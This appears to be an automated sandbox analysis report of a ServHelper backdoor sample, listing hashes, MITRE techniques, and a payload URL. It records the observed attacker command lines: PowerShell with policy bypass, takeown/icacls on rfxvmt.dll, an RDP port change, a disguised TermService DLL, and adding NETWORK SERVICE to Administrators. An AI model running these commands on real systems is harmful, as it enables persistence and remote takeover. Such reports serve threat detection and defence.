servhelper | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

Analysis

max time kernel
140s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-10-2024 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
Size

5.9MB
MD5

472208d7ba18d4c14b7e90b9db5d6feb
SHA1

ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256

ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512

9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
SSDEEP

49152:awptF+Srb/TkvO90dL3BmAFd4A64nsfJ9KN5/Jf/LnBqOvF319Gh7TF7meaKBdZE:awNxKDmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

Processes:

net.exenet1.execmd.exenet.exenet1.execmd.exe

pid	Process
3536	net.exe
756	net1.exe
5048	cmd.exe
2372	net.exe
408	net1.exe
4152	cmd.exe

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	Process
24	4108	powershell.exe
28	4108	powershell.exe
30	4108	powershell.exe
32	4108	powershell.exe
38	4108	powershell.exe
40	4108	powershell.exe
42	4108	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

Processes:

net.exenet1.execmd.exe

pid	Process
4404	net.exe
384	net1.exe
1256	cmd.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
2564	icacls.exe
1100	takeown.exe
3848	icacls.exe
1280	icacls.exe
4972	icacls.exe
1196	icacls.exe
4288	icacls.exe
1076	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
3620
3620

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
1196	icacls.exe
4288	icacls.exe
1076	icacls.exe
2564	icacls.exe
1100	takeown.exe
3848	icacls.exe
1280	icacls.exe
4972	icacls.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000a000000023ca6-84.dat	upx
behavioral2/files/0x0008000000023ca7-85.dat	upx

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE30D.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tv21sfrb.sww.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE31D.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0tg2u4mm.okp.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE31E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE340.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE33F.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4604	powershell.exe
2864	powershell.exe
3872	powershell.exe
4108	powershell.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
3544	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1664	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc	stream
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4744	powershell.exe
4744	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
2864	powershell.exe
2864	powershell.exe
3872	powershell.exe
3872	powershell.exe
4744	powershell.exe
4744	powershell.exe
4744	powershell.exe
4108	powershell.exe
4108	powershell.exe
4108	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
656
656

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	5000	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	1280	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3544	WMIC.exe
Token: SeAuditPrivilege	3544	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3544	WMIC.exe
Token: SeAuditPrivilege	3544	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2652	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2652	WMIC.exe
Token: SeAuditPrivilege	2652	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2652	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2652	WMIC.exe
Token: SeAuditPrivilege	2652	WMIC.exe
Token: SeDebugPrivilege	4108	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 5000 wrote to memory of 4744	5000	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe	88
PID 5000 wrote to memory of 4744	5000	472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe	88
PID 4744 wrote to memory of 3640	4744	powershell.exe	92
PID 4744 wrote to memory of 3640	4744	powershell.exe	92
PID 3640 wrote to memory of 932	3640	csc.exe	93
PID 3640 wrote to memory of 932	3640	csc.exe	93
PID 4744 wrote to memory of 4604	4744	powershell.exe	95
PID 4744 wrote to memory of 4604	4744	powershell.exe	95
PID 4744 wrote to memory of 2864	4744	powershell.exe	99
PID 4744 wrote to memory of 2864	4744	powershell.exe	99
PID 4744 wrote to memory of 3872	4744	powershell.exe	101
PID 4744 wrote to memory of 3872	4744	powershell.exe	101
PID 4744 wrote to memory of 1100	4744	powershell.exe	106
PID 4744 wrote to memory of 1100	4744	powershell.exe	106
PID 4744 wrote to memory of 3848	4744	powershell.exe	107
PID 4744 wrote to memory of 3848	4744	powershell.exe	107
PID 4744 wrote to memory of 1280	4744	powershell.exe	108
PID 4744 wrote to memory of 1280	4744	powershell.exe	108
PID 4744 wrote to memory of 4972	4744	powershell.exe	109
PID 4744 wrote to memory of 4972	4744	powershell.exe	109
PID 4744 wrote to memory of 1196	4744	powershell.exe	110
PID 4744 wrote to memory of 1196	4744	powershell.exe	110
PID 4744 wrote to memory of 4288	4744	powershell.exe	111
PID 4744 wrote to memory of 4288	4744	powershell.exe	111
PID 4744 wrote to memory of 1076	4744	powershell.exe	112
PID 4744 wrote to memory of 1076	4744	powershell.exe	112
PID 4744 wrote to memory of 2564	4744	powershell.exe	113
PID 4744 wrote to memory of 2564	4744	powershell.exe	113
PID 4744 wrote to memory of 3820	4744	powershell.exe	114
PID 4744 wrote to memory of 3820	4744	powershell.exe	114
PID 4744 wrote to memory of 1664	4744	powershell.exe	115
PID 4744 wrote to memory of 1664	4744	powershell.exe	115
PID 4744 wrote to memory of 2256	4744	powershell.exe	116
PID 4744 wrote to memory of 2256	4744	powershell.exe	116
PID 4744 wrote to memory of 3984	4744	powershell.exe	117
PID 4744 wrote to memory of 3984	4744	powershell.exe	117
PID 3984 wrote to memory of 2020	3984	net.exe	118
PID 3984 wrote to memory of 2020	3984	net.exe	118
PID 4744 wrote to memory of 932	4744	powershell.exe	119
PID 4744 wrote to memory of 932	4744	powershell.exe	119
PID 932 wrote to memory of 2916	932	cmd.exe	120
PID 932 wrote to memory of 2916	932	cmd.exe	120
PID 2916 wrote to memory of 4640	2916	cmd.exe	121
PID 2916 wrote to memory of 4640	2916	cmd.exe	121
PID 4640 wrote to memory of 4636	4640	net.exe	122
PID 4640 wrote to memory of 4636	4640	net.exe	122
PID 4744 wrote to memory of 3416	4744	powershell.exe	123
PID 4744 wrote to memory of 3416	4744	powershell.exe	123
PID 3416 wrote to memory of 2288	3416	cmd.exe	124
PID 3416 wrote to memory of 2288	3416	cmd.exe	124
PID 2288 wrote to memory of 2284	2288	cmd.exe	125
PID 2288 wrote to memory of 2284	2288	cmd.exe	125
PID 2284 wrote to memory of 4432	2284	net.exe	126
PID 2284 wrote to memory of 4432	2284	net.exe	126
PID 1256 wrote to memory of 4404	1256	cmd.exe	132
PID 1256 wrote to memory of 4404	1256	cmd.exe	132
PID 4404 wrote to memory of 384	4404	net.exe	133
PID 4404 wrote to memory of 384	4404	net.exe	133
PID 3168 wrote to memory of 3736	3168	cmd.exe	136
PID 3168 wrote to memory of 3736	3168	cmd.exe	136
PID 3736 wrote to memory of 4544	3736	net.exe	137
PID 3736 wrote to memory of 4544	3736	net.exe	137
PID 4152 wrote to memory of 3536	4152	cmd.exe	140
PID 4152 wrote to memory of 3536	4152	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4744
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\braotvl2\braotvl2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAE4.tmp" "c:\Users\Admin\AppData\Local\Temp\braotvl2\CSCD04D98576D43466283717542B6EBDD10.TMP"
      4⤵
      PID:932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3872
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1100
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3848
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4972
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1196
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4288
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1076
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2564
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3820
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:1664
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2256
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
